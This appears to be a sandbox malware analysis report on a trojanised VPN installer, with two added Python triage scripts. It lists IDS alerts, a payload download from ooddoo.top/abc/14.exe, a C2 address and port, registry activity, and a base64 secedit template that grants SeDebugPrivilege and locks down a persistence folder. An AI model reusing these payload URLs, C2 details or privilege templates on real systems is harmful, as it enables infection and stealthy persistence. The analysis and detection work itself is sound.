Source: Process started | Author: vburov | Data: Command: C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS, CommandLine: C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS, CommandLine|base64offset|contains: , Image: C:\Windows\System32\svchost.exe, NewProcessName: C:\Windows\System32\svchost.exe, OriginalFileName: C:\Windows\System32\svchost.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 632, ProcessCommandLine: C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS, ProcessId: 7544, ProcessName: svchost.exe
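The two PowerShell one-liners matched above (ProcessId 5996 and 1088, both spawned by _P18sPbB.exe) build a secedit security template in %TEMP%, apply it with secedit.exe /configure and delete it. The script below is an added triage example, not part of the Joe Sandbox report and not the sample's own code. It recovers the template from a logged command line (the FromBase64String argument decodes to a UTF-16 file with a BOM) or takes the template text directly, parses the INF sections, and spells out what applying it changes: the [Privilege Rights] line assigns SeDebugPrivilege to S-1-5-18 (SYSTEM), and since a template's user-right line is the complete grantee list for that right, secedit /configure replaces whatever assignment existed before; the [File Security] line of the SeDebugPrivilege1.inf variant places an inherited deny ACE for Everyone on C:\ProgramData\Program, the directory that the Run key set by the same process points at. The base64 blob is copied from the command line above, the Set-Content template text is reconstructed from that command's array elements, and the SID and SDDL lookup tables are deliberately partial.

```python
"""Recover and triage the secedit.exe templates seen in this report.

Added example (not Joe Sandbox code, not the sample's code).  The PowerShell
one-liners matched above write an INF security template to %TEMP% and apply
it with `secedit.exe /configure`; this pulls the template out of the logged
command line or takes it as text, then reports what applying it would change.
"""
import base64
import re
from collections import OrderedDict

# Base64 argument copied verbatim from the SeDebugPrivilege4.inf command line above.
B64_TEMPLATE = "//5bAFUAbgBpAGMAbwBkAGUAXQANAAoAVQBuAGkAYwBvAGQAZQA9AHkAZQBzAA0ACgBbAFYAZQByAHMAaQBvAG4AXQANAAoAcwBpAGcAbgBhAHQAdQByAGUAPQAiACQAQwBIAEkAQwBBAEcATwAkACIADQAKAFIAZQB2AGkAcwBpAG8AbgA9ADEADQAKAFsAUAByAGkAdgBpAGwAZQBnAGUAIABSAGkAZwBoAHQAcwBdAA0ACgBTAGUARABlAGIAdQBnAFAAcgBpAHYAaQBsAGUAZwBlACAAPQAgACoAUwAtADEALQA1AC0AMQA4AA0ACgA="
# Abbreviated form of that command line; enough for extract_b64_inf() to find the blob.
LOGGED_CMDLINE = ("powershell.exe -NoProfile -C \"[IO.File]::WriteAllBytes([IO.Path]::Combine("
                  "$env:TEMP, 'SeDebugPrivilege4.inf'), [Convert]::FromBase64String('"
                  + B64_TEMPLATE + "')); secedit.exe /configure ...\"")
# Template the Set-Content variant (SeDebugPrivilege1.inf) writes, reconstructed
# here from the array elements in that command line.
SETCONTENT_INF = "\n".join([
    "[Unicode]", "Unicode=yes", "[Version]", 'signature="$CHICAGO$"', "Revision=1",
    "[Privilege Rights]", "SeDebugPrivilege = *S-1-5-18",
    "[File Security]", '"C:\\ProgramData\\Program",0,"D:AR(D;OICI;DTSDRCWD;;;WD)"',
])

WELL_KNOWN_SIDS = {"S-1-5-18": "SYSTEM", "S-1-5-32-544": "Administrators", "S-1-1-0": "Everyone"}
# Partial SDDL tables: the abbreviations used in this report plus a few common ones.
SDDL_ACE_TYPE = {"A": "allow", "D": "deny"}
SDDL_RIGHTS = {"SD": "DELETE", "DT": "DELETE_TREE", "RC": "READ_CONTROL", "WD": "WRITE_DAC",
               "WO": "WRITE_OWNER", "GA": "GENERIC_ALL", "GR": "GENERIC_READ",
               "GW": "GENERIC_WRITE", "FA": "FILE_ALL_ACCESS"}
SDDL_TRUSTEE = {"WD": "Everyone", "SY": "SYSTEM", "BA": "Administrators", "AU": "Authenticated Users"}


def extract_b64_inf(cmdline):
    """Decode the FromBase64String('...') argument of a logged command line, or None."""
    m = re.search(r"FromBase64String\('([A-Za-z0-9+/=]+)'\)", cmdline)
    if not m:
        return None
    raw = base64.b64decode(m.group(1))
    # secedit templates are UTF-16 with a BOM; the utf-16 codec consumes the BOM.
    return raw.decode("utf-16") if raw[:2] in (b"\xff\xfe", b"\xfe\xff") else raw.decode("utf-8")


def parse_inf(text):
    """Split an INF/security template into an ordered {section: [raw lines]} map."""
    sections, current = OrderedDict(), None
    for raw in text.splitlines():
        line = raw.strip().lstrip("\ufeff")
        if not line or line.startswith(";"):
            continue
        m = re.match(r"^\[(.+)\]$", line)
        if m:
            current = m.group(1)
            sections.setdefault(current, [])
        elif current is not None:
            sections[current].append(line)
    return sections


def describe_ace(ace):
    """Expand one SDDL ACE such as 'D;OICI;DTSDRCWD;;;WD' into words."""
    ace_type, flags, rights, _obj, _inh, trustee = ace.split(";")[:6]
    if rights.startswith("0x"):
        names = [rights]  # raw access mask, left as-is
    else:
        names = [SDDL_RIGHTS.get(rights[i:i + 2], rights[i:i + 2]) for i in range(0, len(rights), 2)]
    who = SDDL_TRUSTEE.get(trustee) or WELL_KNOWN_SIDS.get(trustee, trustee)
    return f"{SDDL_ACE_TYPE.get(ace_type, ace_type)} {who} {','.join(names)} [{flags}]"


def triage(sections):
    """List what secedit /configure would change when it applies the template."""
    findings = []
    for entry in sections.get("Privilege Rights", []):
        priv, _, grantees = entry.partition("=")
        for g in grantees.split(","):
            sid = g.strip().lstrip("*")  # '*' marks a literal SID in these templates
            if not sid:  # 'SeXxxPrivilege =' with no grantee strips the right from everyone
                findings.append(f"{priv.strip()} removed from every account")
                continue
            label = WELL_KNOWN_SIDS.get(sid)
            findings.append(f"{priv.strip()} assigned to {sid}" + (f" ({label})" if label else ""))
    for entry in sections.get("File Security", []):
        path, _mode, sddl = [p.strip().strip('"') for p in entry.split(",", 2)]
        for ace in re.findall(r"\(([^)]*)\)", sddl):
            findings.append(f"{path}: {describe_ace(ace)}")
    return findings


if __name__ == "__main__":
    for label, text in (("FromBase64String variant", extract_b64_inf(LOGGED_CMDLINE)),
                        ("Set-Content variant", SETCONTENT_INF)):
        print(label)
        for finding in triage(parse_inf(text)):
            print("  " + finding)
```

Run against a real export, feed each process-creation command line that contains both FromBase64String and secedit.exe through extract_b64_inf(); the [Privilege Rights] and [File Security] findings are what to compare against the host's baseline (secedit /export /cfg on a clean machine) before deciding whether the template needs reverting.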
Timestamp | SID | Severity | Classtype | Source IP | Source Port | Destination IP | Destination Port | Protocol
2024-12-29T16:09:26.781807+0100 | 2022482 | 1 | A Network Trojan was detected | 192.168.2.5 | 49717 | 104.21.81.224 | 80 | TCP
2024-12-29T16:09:29.499309+0100 | 2022482 | 1 | A Network Trojan was detected | 192.168.2.5 | 49720 | 104.21.81.224 | 443 | TCP

Timestamp | SID | Severity | Classtype | Source IP | Source Port | Destination IP | Destination Port | Protocol
2024-12-29T16:09:29.920224+0100 | 2021954 | 1 | A Network Trojan was detected | 104.21.81.224 | 443 | 192.168.2.5 | 49720 | TCP

AV Detection

Source: C:\ProgramData\Program\iusb3mon.exe | Avira: detection malicious, Label: TR/Crypt.XPACK.Gen2
Source: C:\Users\Public\Documents\dtw_H3NyEy\_P18sPbB.exe | Avira: detection malicious, Label: TR/Crypt.XPACK.Gen2
Source: Lets-x64.exe | ReversingLabs: Detection: 13%
Source: Lets-x64.exe | Virustotal: Detection: 13%
Source: Submitted Sample | Integrated Neural Analysis Model: Matched 99.9% probability
Source: C:\ProgramData\Program\iusb3mon.exe | Joe Sandbox ML: detected
Source: C:\Users\Public\Documents\dtw_H3NyEy\_P18sPbB.exe | Joe Sandbox ML: detected
Source: Lets-x64.exe | Joe Sandbox ML: detected

Compliance

Source: C:\ProgramData\Program\iusb3mon.exe | Unpacked PE file: 28.2.iusb3mon.exe.6240000.3.unpack
Source: C:\Users\user\AppData\Local\Temp\_ir_sf_temp_0\irsetup.exe | Directory created: C:\Program Files\product1\
Source: C:\Users\user\AppData\Local\Temp\_ir_sf_temp_0\irsetup.exe | Directory created: C:\Program Files\product1\letsvpn-latest.exe
Source: unknown | HTTPS traffic detected: 104.21.81.224:443 -> 192.168.2.5:49720 version: TLS 1.2
Source: Lets-x64.exe | Static PE information: DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE
Source: Binary string: \ConsoleApplication1\Release\ConsoleApplication1.pdb source: _P18sPbB.exe, 00000011.00000003.2314228018.0000000003440000.00000004.00001000.00020000.00000000.sdmp, iusb3mon.exe, iusb3mon.exe, 0000001C.00000002.4571918062.00000000001EE000.00000002.00000001.01000000.0000000D.sdmp, iusb3mon.exe, 0000001C.00000003.2353080061.0000000000C30000.00000004.00001000.00020000.00000000.sdmp
Source: Binary string: \ConsoleApplication1\Release\ConsoleApplication1.pdb% source: _P18sPbB.exe, 00000011.00000003.2314228018.0000000003440000.00000004.00001000.00020000.00000000.sdmp, iusb3mon.exe, 0000001C.00000002.4571918062.00000000001EE000.00000002.00000001.01000000.0000000D.sdmp, iusb3mon.exe, 0000001C.00000003.2353080061.0000000000C30000.00000004.00001000.00020000.00000000.sdmp
Source: C:\Users\Public\Documents\dtw_H3NyEy\_P18sPbB.exe | Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0F87369F-A4E5-4CFC-BD3E-73E6154572DD}
Source: C:\Users\Public\Documents\dtw_H3NyEy\_P18sPbB.exe | Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\TreatAs
Source: C:\Users\Public\Documents\dtw_H3NyEy\_P18sPbB.exe | Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\InprocServer32
Source: C:\Users\Public\Documents\dtw_H3NyEy\_P18sPbB.exe | Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\InprocHandler32
Source: C:\Users\Public\Documents\dtw_H3NyEy\_P18sPbB.exe | Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\InprocHandler
Source: C:\Users\Public\Documents\dtw_H3NyEy\_P18sPbB.exe | Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0F87369F-A4E5-4CFC-BD3E-73E6154572DD}
Source: C:\Users\Public\Documents\dtw_H3NyEy\_P18sPbB.exe | Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\TreatAs
Source: C:\Users\Public\Documents\dtw_H3NyEy\_P18sPbB.exe | Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\InprocServer32
Source: C:\Users\Public\Documents\dtw_H3NyEy\_P18sPbB.exe | Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\InprocHandler32
Source: C:\Users\Public\Documents\dtw_H3NyEy\_P18sPbB.exe | Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\InprocHandler
Source: C:\Users\Public\Documents\dtw_H3NyEy\_P18sPbB.exe | Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\LocalServer32
Source: C:\Users\Public\Documents\dtw_H3NyEy\_P18sPbB.exe | Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\LocalServer
Source: C:\Users\Public\Documents\dtw_H3NyEy\_P18sPbB.exe | Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0F87369F-A4E5-4CFC-BD3E-73E6154572DD}
Source: C:\Users\Public\Documents\dtw_H3NyEy\_P18sPbB.exe | Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\Elevation
Source: C:\Users\Public\Documents\dtw_H3NyEy\_P18sPbB.exe | Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0F87369F-A4E5-4CFC-BD3E-73E6154572DD}
Source: C:\Users\Public\Documents\dtw_H3NyEy\_P18sPbB.exe | Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\TreatAs
Source: C:\ProgramData\Program\iusb3mon.exe | Code function: 28_2_06242E2C __EH_prolog,FindFirstFileA,DeleteFileA,FindNextFileA,FindClose,RemoveDirectoryA | 28_2_06242E2C
Source: C:\Users\user\AppData\Local\Temp\_ir_sf_temp_0\irsetup.exe | File opened: C:\Users\user
Source: C:\Users\user\AppData\Local\Temp\_ir_sf_temp_0\irsetup.exe | File opened: C:\Users\user\AppData\Roaming\Microsoft\Windows
Source: C:\Users\user\AppData\Local\Temp\_ir_sf_temp_0\irsetup.exe | File opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\desktop.ini
Source: C:\Users\user\AppData\Local\Temp\_ir_sf_temp_0\irsetup.exe | File opened: C:\Users\user\AppData\Roaming\Microsoft
Source: C:\Users\user\AppData\Local\Temp\_ir_sf_temp_0\irsetup.exe | File opened: C:\Users\user\AppData\Roaming
Source: C:\Users\user\AppData\Local\Temp\_ir_sf_temp_0\irsetup.exe | File opened: C:\Users\user\AppData

Networking

Source: Network traffic | Suricata IDS: 2022482 - Severity 1 - ET MALWARE JS/Nemucod requesting EXE payload 2016-02-01 : 192.168.2.5:49717 -> 104.21.81.224:80
Source: Network traffic | Suricata IDS: 2022482 - Severity 1 - ET MALWARE JS/Nemucod requesting EXE payload 2016-02-01 : 192.168.2.5:49720 -> 104.21.81.224:443
Source: Network traffic | Suricata IDS: 2021954 - Severity 1 - ET MALWARE JS/Nemucod.M.gen downloading EXE payload : 104.21.81.224:443 -> 192.168.2.5:49720
Source: global traffic | TCP traffic: 192.168.2.5:49741 -> 202.79.169.178:25445
Source: unknown | TCP traffic detected without corresponding DNS query: 202.79.169.178 (reported 4 times)
Source: unknown | UDP traffic detected without corresponding DNS query: 1.1.1.1
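The report flags the TCP connections from _P18sPbB.exe to 202.79.169.178:25445 as traffic with no corresponding DNS query, while the ooddoo.top download went to an address that a lookup had returned. The check below is an added example, not Joe Sandbox code: it replays a constructed event list built from the addresses and ports in this report (the timestamps are invented for ordering only), records every IP returned in a DNS answer, and flags later outbound connections to public IPs that never appeared in an answer. It replays events in time order, so a connection logged before its own lookup is flagged too, and unlike the sandbox signature it treats UDP/53 to a configured resolver (1.1.1.1 here) as expected rather than as unresolved traffic.

```python
"""Correlate DNS answers with later outbound connections.

Added example for this report (not Joe Sandbox code).  The event list is
constructed from the addresses and ports in the report, not exported logs.
"""
import ipaddress
from collections import defaultdict

# (timestamp, kind, fields); times are relative seconds, invented for ordering.
EVENTS = [
    (1.0, "dns", {"qname": "ooddoo.top", "server": "1.1.1.1", "answers": ["104.21.81.224"]}),
    (1.1, "conn", {"src": "192.168.2.5", "sport": 53010, "dst": "1.1.1.1", "dport": 53, "proto": "udp"}),
    (2.0, "conn", {"src": "192.168.2.5", "sport": 49717, "dst": "104.21.81.224", "dport": 80, "proto": "tcp"}),
    (3.0, "conn", {"src": "192.168.2.5", "sport": 49720, "dst": "104.21.81.224", "dport": 443, "proto": "tcp"}),
    (4.0, "conn", {"src": "192.168.2.5", "sport": 49741, "dst": "202.79.169.178", "dport": 25445, "proto": "tcp"}),
]


def is_internal(ip):
    """Addresses no DNS lookup is expected for: RFC1918, loopback, link-local, multicast."""
    a = ipaddress.ip_address(ip)
    return a.is_private or a.is_loopback or a.is_link_local or a.is_multicast


def unresolved_connections(events, resolvers=("1.1.1.1",)):
    """Return one finding per outbound connection to a public IP that no earlier
    DNS answer in `events` returned.  Events are replayed in timestamp order, so
    a connection that precedes its own lookup is still flagged."""
    answered = defaultdict(set)   # ip -> names that resolved to it so far
    findings = []
    for _ts, kind, f in sorted(events, key=lambda e: e[0]):
        if kind == "dns":
            for ip in f["answers"]:
                answered[ip].add(f["qname"])
        elif kind == "conn":
            if is_internal(f["dst"]):
                continue
            if f["proto"] == "udp" and f["dport"] == 53 and f["dst"] in resolvers:
                continue   # the resolver traffic itself
            if f["dst"] not in answered:
                findings.append(
                    f"{f['src']}:{f['sport']} -> {f['dst']}:{f['dport']}/{f['proto']} (no prior DNS answer)")
    return findings


def resolved_names(events, ip):
    """Which names resolved to `ip` anywhere in the capture (for the analyst's note)."""
    return sorted({f["qname"] for _t, k, f in events if k == "dns" and ip in f["answers"]})


if __name__ == "__main__":
    for line in unresolved_connections(EVENTS):
        print(line)
    print("104.21.81.224 was returned for:", resolved_names(EVENTS, "104.21.81.224"))
```

On real data the DNS events come from the resolver log or Sysmon event 22 and the connections from Sysmon event 3 or flow records; hard-coded C2 addresses like the one here surface because nothing in the capture ever resolved to them.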
Source: C:\ProgramData\Program\iusb3mon.exe | Code function: 28_2_062467CC shellex,SetThreadExecutionState,DeleteFileA,DeleteFileA,DeleteFileA,DeleteFileA,DeleteFileA,DeleteFileA,DeleteFileA,DeleteFileA,DeleteFileA,WinExec,WinExec,WinExec,WinExec,CreateThread,CreateThread,CreateThread,CreateThread,CreateThread,CreateThread,CreateThread,CreateThread,CreateThread,WSAStartup,socket,GetCurrentThreadId,htons,inet_addr,connect,InternetOpenA,InternetOpenUrlA,InternetReadFile,InternetCloseHandle,InternetCloseHandle,GetModuleFileNameA,GetModuleFileNameA,CopyFileA,RegOpenKeyExA,RegSetValueExA,RegCloseKey,Sleep,ExitProcess,StartServiceCtrlDispatcherA,Sleep,GetModuleFileNameA,CopyFileA,Sleep | 28_2_062467CC
Source: global traffic | HTTP traffic detected: GET /abc/14.exe HTTP/1.1; Accept: */*; User-Agent: Setup Factory 9.0; Connection: Keep-Alive; Cache-Control: no-cache; Host: ooddoo.top
Source: global traffic | HTTP traffic detected: GET /abc/14.exe HTTP/1.1; Accept: */*; Content-Type: application/x-www-form-urlencoded; User-Agent: Setup Factory 9.0; Host: ooddoo.top; Connection: Keep-Alive; Cache-Control: no-cache
Source: global traffic | DNS traffic detected: DNS query: ooddoo.top
Source: iusb3mon.exe, iusb3mon.exe, 0000001C.00000002.4577931834.0000000006640000.00000004.00000020.00020000.00000000.sdmp, iusb3mon.exe, 0000001C.00000002.4577401759.0000000006240000.00000040.00001000.00020000.00000000.sdmp, iusb3mon.exe, 0000001C.00000002.4577257538.0000000004D10000.00000040.00001000.00020000.00000000.sdmp | String found in binary or memory: http://%s/ip.txt
Source: iusb3mon.exe, 0000001C.00000002.4577931834.0000000006640000.00000004.00000020.00020000.00000000.sdmp, iusb3mon.exe, 0000001C.00000002.4577401759.0000000006240000.00000040.00001000.00020000.00000000.sdmp, iusb3mon.exe, 0000001C.00000002.4577257538.0000000004D10000.00000040.00001000.00020000.00000000.sdmp | String found in binary or memory: http://%s/ip.txtMozilla/4.0
Source: irsetup.exe, 00000002.00000003.2065368988.0000000005D87000.00000004.00000020.00020000.00000000.sdmp, irsetup.exe, 00000002.00000002.4575166203.0000000002E80000.00000004.00000020.00020000.00000000.sdmp, irsetup.exe, 00000002.00000002.4575772146.0000000004110000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://104.168.152.151/abc/
Source: powershell.exe, 00000015.00000002.2468286953.00000000079F6000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000015.00000002.2470339301.0000000007A0D000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000015.00000002.2468286953.0000000007A07000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://crl.micro
Source: powershell.exe, 0000002A.00000002.2682802486.0000000007B52000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://crl.micro4O
Source: svchost.exe, 00000021.00000002.4023427630.000001F07F400000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://crl.ver)
Source: svchost.exe, 00000021.00000003.2352785710.000001F07F2C0000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://f.c2r.ts.cdn.office.net/pr/492350f6-3a01-4f97-b9c0-c7c6ddf67d60/Office/Data/v32_16.0.16827.20
Source: powershell.exe, 0000000C.00000002.2206862853.000001AEADFC4000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.2206862853.000001AEADE8D000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.2188375512.000001AE9F6EB000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000012.00000002.2413825502.0000000005CEA000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000013.00000002.2459393253.00000000061CA000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000015.00000002.2443179849.000000000647A000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000018.00000002.2440447207.000000000579A000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000027.00000002.2668466400.00000000060EC000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000028.00000002.2668309945.000000000565C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000002A.00000002.2659259430.00000000065E8000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://nuget.org/NuGet.exe
Source: Lets-x64.exe, 00000000.00000002.2187444306.0000000002F20000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://ocsp.comodoca.com0
Source: irsetup.exe, 00000002.00000002.4575166203.0000000002E80000.00000004.00000020.00020000.00000000.sdmp, irsetup.exe, 00000002.00000002.4575772146.0000000004110000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://ooddoo.top/abc/
Source: irsetup.exe, 00000002.00000002.4575166203.0000000002E80000.00000004.00000020.00020000.00000000.sdmp, irsetup.exe, 00000002.00000002.4576101821.0000000006178000.00000004.00000020.00020000.00000000.sdmp, irsetup.exe, 00000002.00000002.4575772146.0000000004110000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://ooddoo.top/abc/14.exe
                              Source: irsetup.exe, 00000002.00000002.4576101821.000000000615F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ooddoo.top/abc/14.exe;e
                              Source: irsetup.exe, 00000002.00000002.4576101821.0000000006178000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ooddoo.top/abc/14.exeN
                              Source: irsetup.exe, 00000002.00000002.4576101821.000000000615F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ooddoo.top/abc/14.exeXd
                              Source: irsetup.exe, 00000002.00000002.4575772146.0000000004110000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ooddoo.top/abc/14.exel1~
                              Source: irsetup.exe, 00000002.00000002.4575772146.0000000004110000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ooddoo.top/abc/14.exel=~
                              Source: powershell.exe, 0000002A.00000002.2522220114.0000000005661000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://pesterbdd.com/images/Pester.png
                              Source: powershell.exe, 0000000C.00000002.2188375512.000001AE9DE11000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000012.00000002.2357715905.0000000004C81000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000013.00000002.2377801523.0000000005161000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000015.00000002.2380767167.0000000005411000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000018.00000002.2370202474.0000000004731000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000027.00000002.2513816105.000000000508E000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000028.00000002.2516061641.00000000045F1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
                              Source: powershell.exe, 0000000C.00000002.2188375512.000001AE9F2D0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0
                              Source: powershell.exe, 0000002A.00000002.2522220114.0000000005661000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html
                              Source: Lets-x64.exe, 00000000.00000002.2187444306.0000000002F20000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.indigorose.com
                              Source: Lets-x64.exe, 00000000.00000003.2058315983.0000000003025000.00000004.00000020.00020000.00000000.sdmp, irsetup.exe, 00000002.00000002.4577432527.00007FF68BC3A000.00000002.00000001.01000000.00000005.sdmp, irsetup.exe, 00000002.00000000.2063081157.00007FF68BC3A000.00000002.00000001.01000000.00000005.sdmpString found in binary or memory: http://www.indigorose.com/route.php?pid=suf9buy
                              Source: Lets-x64.exe, 00000000.00000003.2058315983.0000000003025000.00000004.00000020.00020000.00000000.sdmp, irsetup.exe, 00000002.00000002.4577432527.00007FF68BC3A000.00000002.00000001.01000000.00000005.sdmp, irsetup.exe, 00000002.00000000.2063081157.00007FF68BC3A000.00000002.00000001.01000000.00000005.sdmpString found in binary or memory: http://www.indigorose.com/route.php?pid=suf9buyd
                              Source: powershell.exe, 0000000C.00000002.2187796754.000001AE9C21E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.microsoft.co
                              Source: irsetup.exe, 00000002.00000003.2065368988.0000000005D87000.00000004.00000020.00020000.00000000.sdmp, irsetup.exe, 00000002.00000002.4575772146.0000000004110000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.yourcompany.com
                              Source: powershell.exe, 0000000C.00000002.2188375512.000001AE9DE11000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://aka.ms/pscore68
                              Source: powershell.exe, 00000012.00000002.2357715905.0000000004C81000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000013.00000002.2377801523.0000000005161000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000015.00000002.2380767167.0000000005411000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000018.00000002.2370202474.0000000004731000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000027.00000002.2513816105.000000000508E000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000028.00000002.2516061641.00000000045F1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://aka.ms/pscore6lBeq
                              Source: powershell.exe, 0000002A.00000002.2659259430.000000000657D000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/
                              Source: powershell.exe, 0000002A.00000002.2659259430.000000000657D000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/Icon
                              Source: powershell.exe, 0000002A.00000002.2659259430.000000000657D000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/License
                              Source: svchost.exe, 00000021.00000003.2352785710.000001F07F333000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://g.live.com/odclientsettings/Prod/C:
                              Source: svchost.exe, 00000021.00000003.2352785710.000001F07F2C0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://g.live.com/odclientsettings/ProdV2.C:
                              Source: powershell.exe, 0000002A.00000002.2522220114.0000000005661000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.com/Pester/Pester
                              Source: powershell.exe, 0000000C.00000002.2206862853.000001AEADFC4000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.2206862853.000001AEADE8D000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.2188375512.000001AE9F6EB000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000012.00000002.2413825502.0000000005CEA000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000013.00000002.2459393253.00000000061CA000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000015.00000002.2443179849.000000000647A000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000018.00000002.2440447207.000000000579A000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000027.00000002.2668466400.00000000060EC000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000028.00000002.2668309945.000000000565C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000002A.00000002.2659259430.000000000657D000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://nuget.org/nuget.exe
                              Source: powershell.exe, 0000000C.00000002.2188375512.000001AE9F2D0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://oneget.org
                              Source: powershell.exe, 0000000C.00000002.2188375512.000001AE9F2D0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://oneget.orgX
                              Source: irsetup.exe, 00000002.00000002.4576101821.0000000006178000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ooddoo.top/
                              Source: irsetup.exe, 00000002.00000002.4576101821.000000000615F000.00000004.00000020.00020000.00000000.sdmp, irsetup.exe, 00000002.00000002.4576101821.0000000006178000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ooddoo.top/abc/14.exe
                              Source: irsetup.exe, 00000002.00000002.4576101821.0000000006178000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ooddoo.top/abc/14.exeI
                              Source: irsetup.exe, 00000002.00000002.4576101821.000000000615F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ooddoo.top/abc/14.exeMe
